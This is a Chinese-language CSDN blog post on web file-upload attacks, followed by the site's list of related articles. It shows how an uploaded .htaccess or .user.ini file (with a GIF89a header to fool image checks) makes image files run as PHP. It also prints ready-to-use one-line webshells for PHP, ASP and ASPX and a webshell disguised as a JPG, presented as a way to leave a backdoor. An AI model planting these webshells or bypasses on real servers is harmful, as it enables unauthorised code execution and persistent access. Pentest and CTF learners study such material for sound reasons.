文件上传--.hatccess--.user.ini

最新推荐文章于 2024-03-15 09:30:00 发布
最新推荐文章于 2024-03-15 09:30:00 发布
阅读量1.7k 收藏 11
点赞数
分类专栏: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43613772/article/details/107569844
版权

1、.htaccess文件

在这里插入图片描述

文件上传:

一般.htaccess可以用来留后门和针对黑名单绕过
文件另存为.htaccess写入:

AddType application/x-httpd-php .png   //png文件解析为php文件

上传.htaccess 必须是网站根路径

留后门:

可以在.htaccess 加入php解析规则

类似于把文件名包含1的解析成php

<FilesMatch "1"> 
SetHandler application/x-httpd-php 
</FilesMatch>

filename.png 就会以php执行

以上两种方法执行后创建png文件写入一句话木马或者其他木马就可以创建连接。

php的一句话木马: <?php @eval($_POST['pass']);?>
asp的一句话是:   <%eval request ("pass")%>
aspx的一句话是:  <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

2、.user.ini文件

在这里插入图片描述使用条件:
(1)服务器脚本语言为PHP
(2)对应目录下面有可执行的php文件
(3)服务器使用CGI/FastCGI模式
.user.ini.它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。

实例:上传.user.ini绕过黑名单检验

GIF89a                  //绕过exif_imagetype()
auto_prepend_file=a.jpg //指定在主文件之前自动解析的文件的名称,并包含该文件,就像使用require函数调用它一样。
auto_append_file=a.jpg  //解析后进行包含

优势:跟.htaccess后门比,适用范围更广,nginx/apache/IIS都有效,而.htaccess只适用于apache

操作

首先,构造一个.user.ini文件,内容如下:

GIF89a                  
auto_prepend_file=a.jpg

然后构造一个a.jpg,内容如下:

GIF89a
<script language='php'> @eval($_POST['pass']);</script>

然后将两个文件分别上传到服务器上,拿到回显。

参考链接:https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html

野九
关注
  • 0
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使Nginx服务器支持.htaccess的方法
01-20
可能很多朋友都常用nginx不支持.htaccess,只有apache才支持.htaccess文件,其实这是错误的看法nginx也是支持.hatccess的哦,下面我来给各位总结一下配置方法。 其实nginx和.htaccess一点关系都没有,只是一大堆人深受apache的影响觉得nginx应该也要支持.htaccess功能。在nginx的配置中直接include .htaccess文件就好 include /站点目录/.htaccess; 多么简单,但是更让人哭笑不得的是有大部分人根本就不知道nginx与apache是两个不同webserver程序,于是不少人这么干:在nginx里inc
php防跨站攻击.user.ini批量生成
乔永刚的博客
11-25 845
#!/bin/bash path='/home/wwwroot/www' for file in `ls $path` do touch .user.ini echo "open_basedir=$path/$file/:/tmp/:/proc/" > $path/$file/.user.ini chattr +i $path/$file/.user.ini done ...
文件上传-.user.ini的妙用
最新发布
A_991128a的博客
03-15 862
小伙伴们大家好!本期为大家带来的是在文件上传漏洞中的妙用。.user.ini.user.ini的妙用原理利用.user.ini的环境实战演示​1、先尝试直接上传webshell2、看是否能够上传除php和png外的文件3、上传.user.ini文件4、再次尝试上传webshell5、测试上传的.user.ini与webshell是否能够正常生效6、使用连接工具连接webshell。
.user.ini 作用和配置
曹品东
09-02 881
.htaccess是伪静态环境配置文件,用于lamp。 .user.ini是lnmp文件,里面放的是你网站的文件夹路径地址。目的是防止跨目录访问和文件跨目录读取. 配置 放在根目录 .user.ini open_basedir=/项目路径/:/tmp/:/proc/ 例: open_basedir=/www/aaa/:/tmp/:/proc/ 测试: 没加的时候可以直接读到根目录的文件 加上之后: 就什么也读不到了 ...
文件上传漏洞 续
m0_64118193的博客
06-18 1895
目录1.白名单绕过 00截断(GET注入)2.白名单绕过 00截断(POST注入)00截断,url中%00表示ASCII中的0,而ascii中的0当作特殊字符保留,表示字符串结束,所以url中出现%00表示读取已结束**满足条件:(1)PHP版本......
php超强后门在任意位置创建文件,利用PHP的.user.ini设置文件建造后门
weixin_33617670的博客
03-09 253
0x00 配景这个预计许多同学看了不屑,认为是烂大街的对象了:.htaccess文件组成的PHP后门那么我来个新的吧:.user.ini。它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个要领。我的nginx处事器全部是fpm/fastcgi,我的IISphp5.3以上的全部用的fastcgi/cgi,我win下的apache上也...
thinkphp5 .hatccess文件
qq_42683219的博客
09-12 490
# .htaccess文件是 Apache 服务器中的一个配置文件,它负责相关目录下的网页配置。 # 我们可以利用 .htaccess 文件的 Rewrite 规则来隐藏掉 ThinkPHP URL 中的 index.php 文件(即入口文件), # 于是就实现了 www.supremh.com/模块/控制器/方法,这样的访问方式。 #如果想要使用它,就在需要隐藏 index.php 的目录下创建...
.htaccess详解及.htaccess参数说明
热门推荐
weilee2009的专栏
10-21 5万+
.htaccess文件(或者”分布式配置文件”)提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。 概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可
文件上传之利用user.ini实现任意文件上传
wcwdnmdnmd的博客
02-02 549
攻防世界的easyupload,利用user.ini实现文件上传
.htaccess设置不起作用
laoqiming的专栏
11-20 5171
配置http和https站点,.htaccess设置在http站点起作用,https站点不起作用 经检查,httpd.conf 中的Directory设置了AllowOverride None http站点的Directory配置了AllowOverride All https站点的Directory未配置AllowOverride,使用了httpd.conf 中的Directory设置。 ...
.htaccess rewrite 规则详细说明
01-10
国内的虚拟机一般不提供.htaccess功能(据我所知,discuz的主机好像提供此功能),而在国外主机中,.htaccess功能似乎是标配,笔者的Blog架在MT上,支持.htaccess,每次看到一堆别人写好了的.htaccess设置,很多命令...
cpanel面板php5.2的ini内容,cPanel面板自定义php.ini教程
weixin_34518801的博客
03-23 175
为了服务器安全和负载相关因素考虑,我们的服务器默认禁用了一些函数以及一些其他方面的限制,这些都可以通过自定义php.ini来修改。具体的操作方法是:在网站根目录下创建一个.user.ini文件,使用这个文件来设置需要自定义的参数。如何创建.user.ini文件?先登录cPanel面板(如何登陆?)---打开文件管理器---打开public_html目录(如果是附加域或子域,请打开对应的网站根目录)...
21个非常有用的 .htaccess 提示和技巧
【昆山人在上海】
06-20 879
摘自:http://www.oschina.net/question/12_58586 Apache Web 服务器可以通过 .htaccess 文件来操作各种信息,这是一个目录级配置文件的默认名称,允许去中央化的 Web 服务器配置管理。可用来重写服务器的全局配置。该文件的目的就是为了允许单独目录的访问控制配置,例如密码和内容访问。 下面是 21 个非常有用的 .htacce
Apache的Rewrite规则详细介绍
weixin_34007291的博客
11-10 155
rewrite是一种服务器的重写脉冲技术,它可以使得服务器可以支持 URL 重写,是一种最新流行的服务器技术。它还可以实现限制特定IP访问网站的功能。 工具/原料 Apache 方法/步骤 Rewrite标志 R[=code](force redirect) 强制外部重定向 G(force U...
apache开启.htaccess及.htaccess的使用方法
starstarstone的专栏
10-15 1332
今天本地调试PHP程序,用到了.htaccess,而默认配置里面开启.htaccess,在网上找到了开启.htaccess的可行方法,供朋友们借鉴。(开启我的他的方法不行,查找了一下AllowOverride None全部的都给换成AllowOverride All就了,原因不明
.htaccess是什么?.htaccess几个简单应用
weixin_30675967的博客
10-06 1476
目录 Table of Contents 一、.htaccess简介 什么是.htaccess AllowOverride All 500错误 有用的文档 二、.htaccess访问控制(Allow/Deny) 访问控制基础:Order命令 利用.htaccess过滤域名或网络主机(Allow/Deny) 利用.htaccess禁止访问指定文件(Files...
.htaccess简介
Bendawang's Blog
04-05 1458
.htaccess简介
.htaccess实现php网站伪静态,百分百可用!
TANKING,开源开发者!
05-07 1万+
伪静态是啥?很简单,就是假的静态网页...例如有个网页是:www.xxx.com/index.php?id=1这是动态网页,php后缀的如果改成:www.xxx.com/index-1.html那么这是静态网页从.php变成.html就是伪静态那么怎么变呢?需要在网站代码做手脚吗?不需要。。。我们需要在自己的服务器根目录加一个.htaccess文件即可文件里面的代码如下RewriteEngine ...
ctfhub 全部WP
09-22
根据题目的提示,.hatccess文件【.htaccess是Apache服务器的一个配置文件。它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面,改变文件扩展名、允许/阻止特定的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值